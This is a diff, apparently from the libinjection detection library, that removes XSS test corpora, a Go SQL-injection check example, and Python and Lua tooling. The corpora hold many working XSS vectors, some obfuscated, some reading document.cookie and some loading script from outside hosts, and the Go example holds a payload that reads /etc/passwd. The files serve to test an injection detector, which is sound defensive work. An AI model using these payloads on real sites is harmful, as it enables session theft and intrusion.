<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
||||
|
||||
# IFRAME
|
||||
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
||||
|
||||
# IFRAME Event based
|
||||
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
|
||||
|
||||
# FRAME
|
||||
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
||||
|
||||
# TABLE
|
||||
<TABLE BACKGROUND="javascript:alert('XSS')">
|
||||
|
||||
# TD
|
||||
<TABLE BACKGROUND="javascript:alert('XSS')">
|
||||
|
||||
# DIV background-image
|
||||
<TABLE BACKGROUND="javascript:alert('XSS')">
|
||||
|
||||
# DIV background-image with unicoded XSS exploit
|
||||
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.
|
||||
|
||||
# DIV background-image plus extra characters
|
||||
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||
|
||||
# DIV expression
|
||||
<DIV STYLE="width: expression(alert('XSS'));">
|
||||
|
||||
|
||||
# "Downlevel-hidden block"
|
||||
<!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]-->
|
||||
|
||||
# BASE tag
|
||||
<BASE HREF="javascript:alert('XSS');//">
|
||||
|
||||
# Object tag
|
||||
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
||||
|
||||
# Using an EMBED tag you can embed a Flash movie that contains XSS
|
||||
<EMBED SRC="http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).:org/xss.swf" AllowScriptAccess="always"></EMBED>
|
||||
|
||||
# You can EMBED SVG which can contain your XSS vector
|
||||
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
|
||||
|
||||
# Using ActionScript inside flash can obfuscate your XSS vector
|
||||
# N/A
|
||||
|
||||
# XML data island with CDATA obfuscation
|
||||
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
|
||||
|
||||
# Locally hosted XML with embedded JavaScript that is generated using an XML data island
|
||||
<XML SRC="xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
||||
|
||||
# XSS using HTML quote encapsulatio
|
||||
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||
|
||||
|
File diff suppressed because it is too large
Load Diff
|
@ -1,86 +0,0 @@
|
|||
#
|
||||
# Really simple XSS smoke test
|
||||
#
|
||||
|
||||
#
|
||||
# Script Tags
|
||||
#
|
||||
|
||||
# in plain text context - duh
|
||||
<script>alert(1);</script>
|
||||
|
||||
# as attribute <tag $USERINPUT></tag>
|
||||
><script>alert(1);</script>
|
||||
|
||||
# as unquoted value <tag foo=$USERINPUT></tag>
|
||||
x ><script>alert(1);</script>
|
||||
|
||||
# as single quoted value <tag foo='$USERINPUT'></tag>
|
||||
' ><script>alert(1);</script>
|
||||
|
||||
# as double quoted value <tag foo="$USERINPUT"></tag>
|
||||
"><script>alert(1);</script>
|
||||
|
||||
# inside <style>div:color=$USERINPUT;.. </style>
|
||||
red;</style><script>alert(1);</script>
|
||||
|
||||
# inside <style>div { color=$USERINPUT;..} </style>
|
||||
red;}</style><script>alert(1);</script>
|
||||
|
||||
# inside <div style="color:$USERINPUT"...
|
||||
red;"/><script>alert(1);</script>
|
||||
|
||||
# inside CSS URL, e.g. background-image:url('$USERINPUT')
|
||||
');}</style><script>alert(1);</script>
|
||||
|
||||
|
||||
#
|
||||
# onerror (or on-other)
|
||||
#
|
||||
|
||||
# as attribute <tag $USERINPUT></tag>
|
||||
onerror=alert(1)>
|
||||
|
||||
# as unquoted value <tag foo=$USERINPUT></tag>
|
||||
x onerror=alert(1);>
|
||||
|
||||
# as single quoted value <tag foo='$USERINPUT'></tag>
|
||||
x' onerror=alert(1);>
|
||||
|
||||
# as double quoted value <tag foo='$USERINPUT'></tag>
|
||||
x" onerror=alert(1);>
|
||||
|
||||
#
|
||||
# href-like
|
||||
#
|
||||
|
||||
# duh
|
||||
<a href="javascript:alert(1)">
|
||||
|
||||
<a href='javascript:alert(1)'>
|
||||
|
||||
<a href=javascript:alert(1)>
|
||||
|
||||
<a href = javascript:alert(1); >
|
||||
|
||||
<a href=" javascript:alert(1);" >
|
||||
|
||||
<a href="JAVASCRIPT:alert(1);" >
|
||||
|
||||
<a href=" javascript:alert(1)" >
|
||||
|
||||
<a href=" javascript:alert(1)" >
|
||||
|
||||
<a href=" javascript:alert(1)" >
|
||||
|
||||
# does not work
|
||||
#<a href=" javascript:alert(1)" >
|
||||
|
||||
<a href=" javascript:alert(1)" >
|
||||
|
||||
<a href="Javascript:alert(1)" >
|
||||
|
||||
<a href="Javascript:alert(1)" >
|
||||
|
||||
# really a raw embedded null
|
||||
<a href="j�avascript:alert(1)">
|
|
@ -1,105 +0,0 @@
|
|||
# http://slid.es/mscasharjaved/cross-site-scripting-my-love
|
||||
# http://pastebin.com/u6FY1xDA
|
||||
# @soaj1664ashar
|
||||
#
|
||||
1) <iframe %00 src="	javascript:prompt(1)	"%00>
|
||||
2) <svg><style>{font-family:'<iframe/onload=confirm(1)>'
|
||||
3) <input/onmouseover="javaSCRIPT:confirm(1)"
|
||||
4) <sVg><scRipt %00>alert(1) {Opera}
|
||||
5) <img/src=`%00` onerror=this.onerror=confirm(1)
|
||||
6) <form><isindex formaction="javascript:confirm(1)"
|
||||
7) <img src=`%00`
 onerror=alert(1)

|
||||
8) <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>
|
||||
9) <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
|
||||
10) <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
|
||||
11) <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
|
||||
12) "><h1/onmouseover='\u0061lert(1)'>%00
|
||||
13) <iframe/src="data:text/html,<svg onload=alert(1)>">
|
||||
14) <meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
|
||||
15) <svg><script xlink:href=data:,window.open('https://www.google.com/')></script
|
||||
16) <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
|
||||
17) <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
|
||||
18) <iframe src=javascript:alert(document.location)>
|
||||
19) <form><a href="javascript:\u0061lert(1)">X
|
||||
20) </script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>
|
||||
21) <img/	  src=`~` onerror=prompt(1)>
|
||||
22) <form><iframe 	  src="javascript:alert(1)" 	;>
|
||||
23) <a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a
|
||||
24) http://www.google<script .com>alert(document.location)</script
|
||||
25) <a href=[�]"� onmouseover=prompt(1)//">XYZ</a
|
||||
26) <img/src=@  onerror = prompt('1')
|
||||
27) <style/onload=prompt('XSS')
|
||||
28) <script ^__^>alert(String.fromCharCode(49))</script ^__^
|
||||
29) </style  ><script   :-(>/**/alert(document.location)/**/</script   :-(
|
||||
30) �</form><input type="date" onfocus="alert(1)">
|
||||
31) <form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
|
||||
32) <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
|
||||
33) <iframe srcdoc='<body onload=prompt(1)>'>
|
||||
34) <a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
|
||||
35) <script ~~~>alert(0%250)</script ~~~>
|
||||
36) <style/onload=<!--	> alert (1)>
|
||||
37) <///style///><span %2F onmousemove='alert(1)'>SPAN
|
||||
38) <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)
|
||||
39) "><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
|
||||
40) <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
|
||||
41) <marquee onstart='javascript:alert(1)'>^__^
|
||||
42) <div/style="width:expression(confirm(1))">X</div> {IE7}
|
||||
43) <iframe/%00/ src=javaSCRIPT:alert(1)
|
||||
44) //<form/action=javascript:alert(document.cookie)><input/type='submit'>//
|
||||
45) /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
|
||||
46) //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
|
||||
47) </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>
|
||||
48) <a/href="javascript: javascript:prompt(1)"><input type="X">
|
||||
49) </plaintext\></|\><plaintext/onmouseover=prompt(1)
|
||||
50) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
|
||||
51) <a href="javascript:\u0061le%72t(1)"><button>
|
||||
52) <div onmouseover='alert(1)'>DIV</div>
|
||||
53) <iframe style="position:absolute;top:0;left:0;width:100%25;height:100%25" onmouseover="prompt(1)">
|
||||
54) <a href="jAvAsCrIpT:alert(1)">X</a>
|
||||
55) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
|
||||
56) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
|
||||
57) <var onmouseover="prompt(1)">On Mouse Over</var>
|
||||
58) <a href=javascript:alert(document.cookie)>Click Here</a>
|
||||
59) <img src="/" =_=" title="onerror='prompt(1)'">
|
||||
60) <%25<!--'%25><script>alert(1);</script -->
|
||||
61) <script src="data:text/javascript,alert(1)"></script>
|
||||
62) <iframe/src \/\/onload = prompt(1)
|
||||
63) <iframe/onreadystatechange=alert(1)
|
||||
64) <svg/onload=alert(1)
|
||||
65) <input value=<><iframe/src=javascript:confirm(1)
|
||||
66) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
|
||||
67) http://www.<script>alert(1)</script .com
|
||||
68) <iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe>
|
||||
69) <svg><script ?>alert(1)
|
||||
70) <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
|
||||
71) <img src=`xx:xx`onerror=alert(1)>
|
||||
72) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
|
||||
73) <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
|
||||
74) <math><a xlink:href="//jsfiddle.net/t846h/">click
|
||||
75) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
|
||||
76) <svg contentScriptType=text/vbs><script>MsgBox+1
|
||||
77) <a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
|
||||
78) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
|
||||
79) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
|
||||
80) <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
|
||||
81) <script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
|
||||
82) <object data=javascript:\u0061le%72t(1)>
|
||||
83) <script>+-+-1-+-+alert(1)</script>
|
||||
84) <body/onload=<!-->
alert(1)>
|
||||
85) <script itworksinallbrowsers>/*<script* */alert(1)</script
|
||||
86) <img src ?itworksonchrome?\/onerror = alert(1)
|
||||
87) <svg><script>//
confirm(1);</script </svg>
|
||||
88) <svg><script onlypossibleinopera:-)> alert(1)
|
||||
89) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
|
||||
90) <script x> alert(1) </script 1=2
|
||||
91) <div/onmouseover='alert(1)'> style="x:">
|
||||
# unable to reproduce in IE8 or IE9
|
||||
#92) <--`<img/src=` onerror=alert(1)> --!>
|
||||
93) <script/src=data:text/javascript,alert(1)></script>
|
||||
94) <div style="position:absolute;top:0;left:0;width:100%25;height:100%25" onmouseover="prompt(1)" onclick="alert(1)">x</button>
|
||||
95) "><img src=x onerror=window.open('https://www.google.com/');>
|
||||
96) <form><button formaction=javascript:alert(1)>CLICKME
|
||||
97) <math><a xlink:href="//jsfiddle.net/t846h/">click
|
||||
98) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
|
||||
99) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
|
||||
100) <a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
|
|
@ -1,57 +0,0 @@
|
|||
#
|
||||
# Misc XSS awesomeness from soaj1664ashar feed
|
||||
# https://twitter.com/soaj1664ashar
|
||||
#
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/424961050258063360
|
||||
# 2:46 AM - 20 Jan 2014
|
||||
<iframe/onload=action=/confir/.source+'m';eval(action)(1)>
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/418454103895728128
|
||||
# 3:50 AM - 2 Jan 2014
|
||||
<!--[if WindowsEdition]><script>confirm(location);</script><![endif]-->
|
||||
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/418163175788265472/
|
||||
# 8:34 AM - 1 Jan 2014 :-)
|
||||
><img src=http://i.imgur.com/ISxZ5dd.jpg onmouseover=confirm(/Happy_New_Year_2014/)>
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/416613093490163712
|
||||
# Dec 28, 2013
|
||||
# appears to be specific for a sanitization filter which alters the input
|
||||
# into an XSS-able form.
|
||||
#<form/action=ja	vascr	ipt:confirm(document.cookie)> <button/type=submit>
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/407438076118462464
|
||||
# 6:16 PM - 2 Dec 2013
|
||||
<style/onload = !-alert(1)>
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/407086397493747712
|
||||
# Dec 1, 2013
|
||||
<iframe/name="if(0){\u0061lert(1)}else{\u0061lert(1)}"/onload="eval(name)";>
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/400335443805237248
|
||||
# not sure who is author
|
||||
# FF specific bug
|
||||
# Nov 13, 2013
|
||||
<a href="data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+" style="FONT-SIZE: 1000pt; FONT-FAMILY: Comic Sans MS; position:absolute;top:0;left:0;width:1000;height:1000;opacity:0">ClickMe</a>
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/400257634449637376
|
||||
<svg><;(noitacol)mrifnoc=daolno ;howthehellitworks`=wtf>`
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/400257634449637376
|
||||
# http://jsfiddle.net/DH8wM/10/
|
||||
<svg><GMO=`<ftw=`skrowtillehehtwoh; onload=confirm(location);
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/396307604734881792
|
||||
"><img src=x onerror=confirm(1);>
|
||||
#"><img src=x onerror=confirm(1);>
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/385461391366168576
|
||||
<img/src=x alt=confirm(1) onmouseover=eval(alt)>
|
||||
|
||||
# https://twitter.com/soaj1664ashar/status/367350377894518784
|
||||
# http://pastebin.com/TVH8t5bQ
|
||||
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(document.cookie)</script>"><img/id="confirm(1)"/alt="/"src="/"onerror=eval(id)>'"><img src="http://i.imgur.com/P8mL8.jpg">
|
||||
|
||||
# If a site has length restriction on input field then use chunk of your choice from the above vector :P
|
File diff suppressed because it is too large
Load Diff
|
@ -1,33 +0,0 @@
|
|||
/*
|
||||
* Copyright (c) 2013 Radolsaw Wesolowski
|
||||
*
|
||||
* Permission to use, copy, modify, and distribute this software for any
|
||||
* purpose with or without fee is hereby granted, provided that the above
|
||||
* copyright notice and this permission notice appear in all copies.
|
||||
*
|
||||
*/
|
||||
|
||||
package main
|
||||
|
||||
/*
|
||||
#cgo CFLAGS: -I./libinjection
|
||||
#cgo LDFLAGS: -L./libinjection -linjection
|
||||
#include "libinjection.h"
|
||||
#include "libinjection_sqli.h"
|
||||
*/
|
||||
import "C"
|
||||
import (
|
||||
"bytes"
|
||||
"fmt"
|
||||
"unsafe"
|
||||
)
|
||||
|
||||
func main() {
|
||||
sqlinjection := "asdf asd ; -1' and 1=1 union/* foo */select load_file('/etc/passwd')--"
|
||||
var out [8]C.char
|
||||
pointer := (*C.char)(unsafe.Pointer(&out[0]))
|
||||
if found := C.libinjection_sqli(C.CString(sqlinjection), C.size_t(len(sqlinjection)), pointer); found == 1 {
|
||||
output := C.GoBytes(unsafe.Pointer(&out[0]), 8)
|
||||
fmt.Printf("sqli with fingerprint of '%s'\n", string(output[:bytes.Index(output, []byte{0})]))
|
||||
}
|
||||
}
|
|
@ -1 +0,0 @@
|
|||
lua-TestMore
|
|
@ -1,41 +0,0 @@
|
|||
#!/usr/bin/env python
|
||||
#
|
||||
# Copyright 2012, 2013 Nick Galbreath
|
||||
# nickg@client9.com
|
||||
# BSD License -- see COPYING.txt for details
|
||||
#
|
||||
|
||||
"""
|
||||
Converts a libinjection JSON data file to a C header (.h) file
|
||||
"""
|
||||
|
||||
def toc(obj):
|
||||
""" main routine """
|
||||
if False:
|
||||
print 'fingerprints = {'
|
||||
for fp in sorted(obj[u'fingerprints']):
|
||||
print "['{0}']='X',".format(fp)
|
||||
print '}'
|
||||
|
||||
words = {}
|
||||
keywords = obj['keywords']
|
||||
|
||||
for k,v in keywords.iteritems():
|
||||
words[str(k)] = str(v)
|
||||
|
||||
for fp in list(obj[u'fingerprints']):
|
||||
fp = '0' + fp.upper()
|
||||
words[str(fp)] = 'F';
|
||||
|
||||
print 'words = {'
|
||||
for k in sorted(words.keys()):
|
||||
#print "['{0}']='{1}',".format(k, words[k])
|
||||
print "['{0}']={1},".format(k, ord(words[k]))
|
||||
print '}'
|
||||
return 0
|
||||
|
||||
if __name__ == '__main__':
|
||||
import sys
|
||||
import json
|
||||
sys.exit(toc(json.load(sys.stdin)))
|
||||
|
|
@ -1,26 +0,0 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
Generates a Lua table of fingerprints.
|
||||
One can then add, turn off or delete fingerprints from lua.
|
||||
"""
|
||||
|
||||
def make_lua_table(obj):
|
||||
"""
|
||||
Generates table. Fingerprints don't contain any special chars
|
||||
so they don't need to be escaped. The output may be
|
||||
sorted but it is not required.
|
||||
"""
|
||||
fp = obj[u'fingerprints']
|
||||
print("sqlifingerprints = {")
|
||||
for f in fp:
|
||||
print(' ["{0}"]=true,'.format(f))
|
||||
print("}")
|
||||
return 0
|
||||
|
||||
if __name__ == '__main__':
|
||||
import sys
|
||||
import json
|
||||
with open('../c/sqlparse_data.json', 'r') as fd:
|
||||
make_lua_table(json.load(fd))
|
||||
|
|
@ -1,62 +0,0 @@
|
|||
/* libinjection.i SWIG interface file */
|
||||
%module libinjection
|
||||
%{
|
||||
#include "libinjection.h"
|
||||
#include "libinjection_sqli.h"
|
||||
|
||||
static char libinjection_lua_lookup_word(sfilter* sf, int lookup_type,
|
||||
const char* s, size_t len)
|
||||
{
|
||||
lua_State* L = (lua_State*) sf->userdata;
|
||||
//char* luafunc = (char *)lua_tostring(L, 2);
|
||||
lua_getglobal(L, "lookup_word");
|
||||
SWIG_NewPointerObj(L, (void*)sf, SWIGTYPE_p_libinjection_sqli_state, 0);
|
||||
lua_pushnumber(L, lookup_type);
|
||||
lua_pushlstring(L, s, len);
|
||||
|
||||
if (lua_pcall(L, 3, 1, 0)) {
|
||||
printf("Something bad happened");
|
||||
}
|
||||
|
||||
const char* result = lua_tostring(L, -1);
|
||||
if (result == NULL) {
|
||||
return 0;
|
||||
} else {
|
||||
return result[0];
|
||||
}
|
||||
}
|
||||
%}
|
||||
%include "typemaps.i"
|
||||
|
||||
|
||||
// The C functions all start with 'libinjection_' as a namespace
|
||||
// We don't need this since it's in the libinjection table
|
||||
// i.e. libinjection.libinjection_is_sqli --> libinjection.is_sqli
|
||||
//
|
||||
%rename("%(strip:[libinjection_])s") "";
|
||||
|
||||
%typemap(in) (ptr_lookup_fn fn, void* userdata) {
|
||||
if (lua_isnil(L, 1)) {
|
||||
arg2 = NULL;
|
||||
arg3 = NULL;
|
||||
} else {
|
||||
arg2 = libinjection_lua_lookup_word;
|
||||
arg3 = (void *) L;
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
%typemap(out) stoken_t [ANY] {
|
||||
int i;
|
||||
lua_newtable(L);
|
||||
for (i = 0; i < $1_dim0; i++) {
|
||||
lua_pushnumber(L, i+1);
|
||||
SWIG_NewPointerObj(L, (void*)(& $1[i]), SWIGTYPE_p_stoken_t,0);
|
||||
lua_settable(L, -3);
|
||||
}
|
||||
SWIG_arg += 1;
|
||||
}
|
||||
|
||||
|
||||
%include "libinjection.h"
|
||||
%include "libinjection_sqli.h"
|
|
@ -1,107 +0,0 @@
|
|||
|
||||
require 'libinjection'
|
||||
|
||||
-- dofile('sqlifingerprints.lua')
|
||||
|
||||
-- silly callback that just calls back into C
|
||||
-- identical to libinjection_is_sqli(sql_state, string_input, nil)
|
||||
--
|
||||
function check_pattern_c(sqlstate)
|
||||
return(libinjection.sqli_blacklist(sqlstate) and
|
||||
libinjection.sqli_not_whitelist(sqlstate))
|
||||
end
|
||||
|
||||
-- half lua / half c checker
|
||||
-- use lua based fingerprint lookup and still uses C code
|
||||
-- to eliminate false positives
|
||||
function check_pattern(sqlstate)
|
||||
fp = sqlstate.pat
|
||||
if sqlifingerprints[fp] == true then
|
||||
-- try to eliminate certain false positives
|
||||
return(libinjection.sqli_not_whitelist(sqlstate))
|
||||
else
|
||||
-- not sqli
|
||||
return 0
|
||||
end
|
||||
end
|
||||
|
||||
function lookup_word(sqlstate, ltype, word)
|
||||
if ltype == 'X' then
|
||||
return words['0' .. word:upper()]
|
||||
else
|
||||
return words[word:upper()]
|
||||
end
|
||||
end
|
||||
|
||||
dofile('words.lua')
|
||||
|
||||
|
||||
-- THIS USES BUILT IN FINGERPRINTS
|
||||
-- (with last arg of 'nil')
|
||||
sqli = '1 union select * from table'
|
||||
|
||||
|
||||
sql_state = libinjection.sqli_state()
|
||||
libinjection.sqli_init(sql_state, sqli, sqli:len(), 0)
|
||||
|
||||
print(libinjection.is_sqli(sql_state))
|
||||
print(sql_state.pat)
|
||||
print('----')
|
||||
|
||||
|
||||
|
||||
inputs = {
|
||||
"123 LIKE -1234.5678E+2;",
|
||||
"APPLE 1 9.123 'FOO' \"BAR\"",
|
||||
"/* BAR */ UNION ALL SELECT (2,3,4)",
|
||||
"1 || COS(+0X04) --FOOBAR",
|
||||
"dog apple @cat banana bar",
|
||||
"dog apple cat \"banana \'bar",
|
||||
"102 TABLE CLOTH"
|
||||
}
|
||||
|
||||
function benchmark(imax)
|
||||
local x,s
|
||||
local t0 = os.clock()
|
||||
local sql_state = libinjection.sqli_state()
|
||||
for x = 0, imax do
|
||||
s = inputs[(x % 7) + 1]
|
||||
libinjection.sqli_init(sql_state, s, s:len(), 0)
|
||||
libinjection.is_sqli(sql_state)
|
||||
end
|
||||
local t1 = os.clock()
|
||||
print( imax / (t1-t0) )
|
||||
end
|
||||
|
||||
function benchmark_callback(imax)
|
||||
local x,s
|
||||
local t0 = os.clock()
|
||||
local sql_state = libinjection.sqli_state()
|
||||
for x = 0, imax do
|
||||
s = inputs[(x % 7) + 1]
|
||||
libinjection.sqli_init(sql_state, s, s:len(), 0)
|
||||
libinjection.sqli_callback(sql_state, 'lookup_word');
|
||||
libinjection.is_sqli(sql_state)
|
||||
end
|
||||
local t1 = os.clock()
|
||||
print( imax / (t1-t0) )
|
||||
end
|
||||
|
||||
benchmark(1000000)
|
||||
benchmark_callback(1000000)
|
||||
|
||||
-- THIS USES LUA FINGERPRINTS via 'check_pattern' function above
|
||||
|
||||
if 0 then
|
||||
for x = 1,2 do
|
||||
ok = libinjection.is_sqli(sql_state)
|
||||
if ok == 1 then
|
||||
print(sql_state.pat)
|
||||
vec = sql_state.tokenvec
|
||||
for i = 1, sql_state.pat:len() do
|
||||
print(vec[i].type, vec[i].val)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
@ -1,74 +0,0 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
import glob
|
||||
import sys
|
||||
|
||||
def readtestdata(filename):
|
||||
"""
|
||||
Read a test file and split into components
|
||||
"""
|
||||
|
||||
state = None
|
||||
info = {
|
||||
'--TEST--': '',
|
||||
'--INPUT--': '',
|
||||
'--EXPECTED--': ''
|
||||
}
|
||||
|
||||
for line in open(filename, 'r'):
|
||||
line = line.rstrip()
|
||||
if line in ('--TEST--', '--INPUT--', '--EXPECTED--'):
|
||||
state = line
|
||||
elif state:
|
||||
info[state] += line + '\n'
|
||||
|
||||
# remove last newline from input
|
||||
info['--INPUT--'] = info['--INPUT--'][0:-1]
|
||||
|
||||
return (info['--TEST--'], info['--INPUT--'].strip(), info['--EXPECTED--'].strip())
|
||||
|
||||
def luaescape(s):
|
||||
return s.strip().replace("\\", "\\\\").replace("\n", "\\n").replace("'", "\\'")
|
||||
|
||||
def genluatest(fname, data):
|
||||
# TBD: change to python os.path
|
||||
name = fname.split('/')[-1]
|
||||
if name.startswith('test-tokens-'):
|
||||
testname = 'test_tokens'
|
||||
extra = "\\n"
|
||||
elif name.startswith('test-tokens_mysql'):
|
||||
testname = 'test_tokens_mysql'
|
||||
extra = "\\n"
|
||||
elif name.startswith('test-folding-'):
|
||||
testname = 'test_folding'
|
||||
extra = "\\n"
|
||||
elif name.startswith('test-sqli-'):
|
||||
testname = 'test_fingerprints'
|
||||
extra = ''
|
||||
else:
|
||||
#print "IGNORING: " + name
|
||||
return
|
||||
|
||||
name = name.replace('.txt', '')
|
||||
|
||||
print "is({0}('{1}'),\n '{2}{3}',\n '{4}')\n".format(
|
||||
testname,
|
||||
luaescape(data[1]),
|
||||
extra,
|
||||
luaescape(data[2]),
|
||||
name
|
||||
)
|
||||
|
||||
def test2lua(fname):
|
||||
data = readtestdata(fname)
|
||||
genluatest(fname, data)
|
||||
|
||||
def main():
|
||||
print "require 'testdriver'\n"
|
||||
files = glob.glob('../tests/test-*.txt')
|
||||
print "plan({0})\n".format(len(files))
|
||||
for testfile in sorted(files):
|
||||
test2lua(testfile)
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
|
@ -1,90 +0,0 @@
|
|||
require 'libinjection'
|
||||
require 'Test.More'
|
||||
require 'Test.Builder.Tester'
|
||||
|
||||
function trim(s)
|
||||
return s:find'^%s*$' and '' or s:match'^%s*(.*%S)'
|
||||
end
|
||||
|
||||
function print_token_string(tok)
|
||||
local out = ''
|
||||
if tok.str_open ~= '\0' then
|
||||
out = out .. tok.str_open
|
||||
end
|
||||
out = out .. tok.val
|
||||
if tok.str_close ~= '\0' then
|
||||
out = out .. tok.str_close
|
||||
end
|
||||
return trim(out)
|
||||
end
|
||||
|
||||
function print_token(tok)
|
||||
local out = ''
|
||||
out = out .. tok.type
|
||||
out = out .. ' '
|
||||
if tok.type == 's' then
|
||||
out = out .. print_token_string(tok)
|
||||
elseif tok.type == 'v' then
|
||||
if tok.count == 1 then
|
||||
out = out .. '@'
|
||||
elseif tok.count == 2 then
|
||||
out = out .. '@@'
|
||||
end
|
||||
out = out .. print_token_string(tok)
|
||||
else
|
||||
out = out .. tok.val
|
||||
end
|
||||
return '\n' .. trim(out)
|
||||
end
|
||||
|
||||
function test_tokens(input)
|
||||
local out = ''
|
||||
local sql_state = libinjection.sqli_state()
|
||||
libinjection.sqli_init(sql_state, input, input:len(),
|
||||
libinjection.FLAG_QUOTE_NONE + libinjection.FLAG_SQL_ANSI)
|
